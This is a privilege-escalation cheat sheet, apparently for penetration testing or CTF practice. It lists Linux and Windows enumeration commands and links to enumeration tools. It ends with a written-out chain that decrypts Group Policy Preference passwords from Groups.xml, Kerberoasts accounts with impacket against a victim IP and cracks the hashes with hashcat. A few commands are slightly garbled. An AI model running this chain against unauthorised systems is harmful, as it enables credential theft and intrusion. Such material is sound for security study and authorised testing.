LINUX
#Firstly, you can run the script below. It is important that you read the output of this script.
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
#Kernel and OS
uname -a
cat /etc/issue
cat /etc/redhat-release //Redhat
cat /etc/lsb-release //Debian
#Sudo misconfiguration;
sudo -l
sudo -u scriptmanager bash //Change user with "sudo" command
#Detection of programs with SUID bits;
find / -perm +4000 -user root -type f -print 2>/dev/null
#Scheduled jobs;
crontab -l
cat /etc/crontab
#Detection of services run by root;
ps aux | grep root
#Detection of installed applications;
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
#For more manual enumeration steps;
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
-------------------------------------------------------------------------------------------------------------------------------
WINDOWS
#For the detection of missing patches;
https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
#Operating System
systeminfo
wmic qfe
#Users
whoami
echo %USERNAME%
net users
net user <username>
whoami /priv
net localgroup
#Network
ipconfig /all
route print
arp -A
netstat -ano
#Programs
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
#Unquoted service path
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
#Scheduled tasks;
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
#For more manual enumeration steps;
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
#For practical examples;
https://www.youtube.com/watch?v=Fms9UuW05DA&list=PLi0kul0fEhZ9LNZN0-A3nX2xcx2R70JwN
#Groups.xml
get Groups.xml
cat Groups.xml (name, password)
gpp-Decrypt password #decrypt_password
smbclient -W <domain_name> -U name //<domain_name>/share_name
#SPN
git https://github.com/SecureAuthCorp/impacket.git
python GetUsersSPN.py <domain_name>/user:decrypt_password -dc-ip <victim_ip> -request
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
-------------------------------------------------------------------------------------------------------------------------------